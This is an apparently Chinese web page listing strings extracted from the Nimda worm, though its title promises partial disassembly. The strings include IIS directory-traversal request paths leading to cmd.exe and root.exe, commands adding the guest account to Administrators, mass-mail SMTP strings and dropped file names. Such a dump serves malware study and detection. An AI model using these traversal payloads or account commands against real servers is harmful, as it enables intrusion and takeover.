📄 8.htm
字号:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD><TITLE>NIMDA(尼姆达)病毒部分反汇编代码</TITLE>
<META http-equiv=Content-Type content="text/html; charset=gb2312">
<STYLE type=text/css>BODY {
FONT-SIZE: 9pt; FONT-FAMILY: "宋体"
}
TABLE {
FONT-SIZE: 9pt; FONT-FAMILY: "宋体"
}
TD {
FONT-SIZE: 9pt; FONT-FAMILY: "宋体"
}
INPUT {
FONT-SIZE: 9pt; FONT-FAMILY: "宋体"
}
TEXTAREA {
FONT-SIZE: 9pt; FONT-FAMILY: "宋体"
}
SELECT {
FONT-SIZE: 9pt; FONT-FAMILY: "宋体"
}
CODE {
FONT-SIZE: 9pt; FONT-FAMILY: "宋体r"
}
A {
COLOR: #005500
}
A:hover {
COLOR: #cc0000
}
.border {
BORDER-RIGHT: #000000 1px solid; BORDER-TOP: #000000 1px solid; LIST-STYLE-POSITION: inside; BORDER-LEFT: #000000 1px solid; BORDER-BOTTOM: #000000 1px solid; LIST-STYLE-TYPE: square; BACKGROUND-COLOR: transparent
}
</STYLE>
<META content="MSHTML 6.00.2600.0" name=GENERATOR></HEAD>
<BODY text=#000000 bgColor=#ffffff>
<TABLE borderColor=#339933 cellSpacing=0 borderColorDark=#ffffff cellPadding=0
width=229 align=center borderColorLight=#000000 border=1>
<TBODY>
<TR vAlign=center bgColor=#009900>
<TD >
<TABLE cellSpacing=0 cellPadding=0 width="100%" border=0>
<TBODY>
<TR>
<TD width=17> </TD>
<TD width=590>
<TABLE width="65%" align=center border=0>
<TBODY>
<TR>
<TD bgColor=#009900>
<DIV align=center><FONT
face="Verdana, Arial, Helvetica, sans-serif"
color=#ffffff><B>NIMDA(尼姆达)病毒部分反汇编代码</B></FONT></DIV>
</TD>
</TR>
</TBODY>
</TABLE>
</TD>
<TD width=19>
<DIV align=center></DIV>
</TD>
</TR>
</TBODY>
</TABLE>
</TD>
</TR>
<TR vAlign=center align=left bgColor=#cccccc>
<TD></TD>
</TR>
<TR vAlign=top>
<TD class=tenpt><CODE><FONT color=#000000><br>
</FONT></CODE><CODE><FONT color=#000000><FONT
color=#cc0000> </FONT></FONT></CODE><CODE><FONT color=#000000><FONT
color=#cc0000> </FONT></FONT></CODE>病毒数据串
<p>" .exe" <br>
" -dontrunold" <br>
" -qusery9bnow" <br>
"% Privileged Time" <br>
"% Processor Time" <br>
"% User Time" <br>
"%ld %ld %ld" <br>
"%ld %ld" <br>
"%ls" <br>
"." <br>
".." <br>
".asp" <br>
".doc" <br>
".eml" <br>
".exe" <br>
".htm" <br>
".nws" <br>
"/_mem_bin/..%255c../..%255c../..%255c.." <br>
"/_vti_bin/..%255c../..%255c../..%255c.." <br>
"/Admin.dll" <br>
"/c" <br>
"/d" <br>
"/MSADC" <br>
"/msadc/..%255c../..%255c../..%255c/..%c1%1c../" <br>
"/root.exe?/c+" <br>
"/scripts" <br>
"/scripts/..%%35%63.." <br>
"/scripts/..%%35c.." <br>
"/scripts/..%25%35%63.." <br>
"/scripts/..%252f.." <br>
"/scripts/..%255c.." <br>
"/scripts/..%c0%2f.." <br>
"/scripts/..%c0%af.." <br>
"/scripts/..%c1%1c.." <br>
"/scripts/..%c1%9c.." <br>
"/winnt/system32/cmd.exe?/c+" <br>
"\" <br>
"\*.*" <br>
"\\" <br>
"\\%s" <br>
"\load.exe" <br>
"\mmc.exe" <br>
"\readme*.exe" <br>
"\readme.eml" <br>
"\riched20.dll" <br>
"\system.ini" <br>
"\wininit.ini" <br>
"__WSAFDIsSet" <br>
">" <br>
"aabbcc" <br>
"admin.dll" <br>
"Admin.dll" <br>
"bind" <br>
"boot" <br>
"c:" <br>
"C:\" <br>
"c:\Admin.dll" <br>
"Cache" <br>
"closesocket" <br>
"connect" <br>
"Context Switches/sec" <br>
"Counter 009" <br>
"Counters" <br>
"CreateRemoteThread" <br>
"d:\Admin.dll" <br>
"DATA" <br>
"default" <br>
"dir" <br>
"dontrunold" <br>
"e:\Admin.dll" <br>
"Elapsed Time" <br>
"Exec Read Only" <br>
"Exec Read/Write" <br>
"Exec Write Copy" <br>
"Executable" <br>
"EXPLORER" <br>
"explorer.exe load.exe -dontrunold" <br>
"Flags" <br>
"From: <" <br>
"fsdhqherwqi2001" <br>
"GET %s HTTP/1.0" <br>
"gethostbyname" <br>
"gethostname" <br>
"HeapAlloc" <br>
"HeapCompact" <br>
"HeapCreate" <br>
"HeapDestroy" <br>
"HeapFree" <br>
"HELO " <br>
"Hidden" <br>
"HideFileExt" <br>
"html" <br>
"htonl" <br>
"htons" <br>
"ID Process" <br>
"ID Thread" <br>
"Image Space Exec Read Only" <br>
"Image Space Exec Read/Write" <br>
"Image Space Exec Write Copy" <br>
"Image Space Executable" <br>
"Image Space No Access" <br>
"Image Space Read Only" <br>
"Image Space Read/Write" <br>
"Image Space Write Copy" <br>
"Image" <br>
"index" <br>
"inet_addr" <br>
"inet_ntoa" <br>
"ioctlsocket" <br>
"KERNEL32.DLL" <br>
"Last Counter" <br>
"localgroup Administrators guest " <br>
"localgroup Guests guest /add" <br>
"MAIL FROM: <" <br>
"main" <br>
"MAPI32.DLL" <br>
"MAPIFindNext" <br>
"MAPIFreeBuffer" <br>
"MAPILogoff" <br>
"MAPILogon" <br>
"MAPIReadMail" <br>
"MAPIResolveName" <br>
"MAPISendMail" <br>
"Mapped Space Exec Read Only" <br>
"Mapped Space Exec Read/Write" <br>
"Mapped Space Exec Write Copy" <br>
"Mapped Space Executable" <br>
"Mapped Space No Access" <br>
"Mapped Space Read Only" <br>
"Mapped Space Read/Write" <br>
"Mapped Space Write Copy" <br>
"mep" <br>
"MIME-Version: 1.0" <br>
"MPR.DLL" <br>
"NameServer" <br>
"net" <br>
"No Access" <br>
"ntohl" <br>
"ntohs" <br>
"NUL=" <br>
"NULL" <br>
"octet" <br>
"open" <br>
"Page Faults/sec" <br>
"Parm1enc" <br>
"Parm2enc" <br>
"Path" <br>
"Personal" <br>
"Priority Base" <br>
"Priority Current" <br>
"Private Bytes" <br>
"Process Address Space" <br>
"Process" <br>
"QUIT" <br>
"qusery9bnow" <br>
"RCPT TO: <" <br>
"Read Only" <br>
"Read/Write" <br>
"readme" <br>
"recv" <br>
"recvfrom" <br>
"RegisterServiceProcess" <br>
"Remark" <br>
"Reserved Space Exec Read Only" <br>
"Reserved Space Exec Read/Write" <br>
"Reserved Space Exec Write Copy" <br>
"Reserved Space Executable" <br>
"Reserved Space No Access" <br>
"Reserved Space Read Only" <br>
"Reserved Space Read/Write" <br>
"Reserved Space Write Copy" <br>
"riched20.dll" <br>
"select" <br>
"send" <br>
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -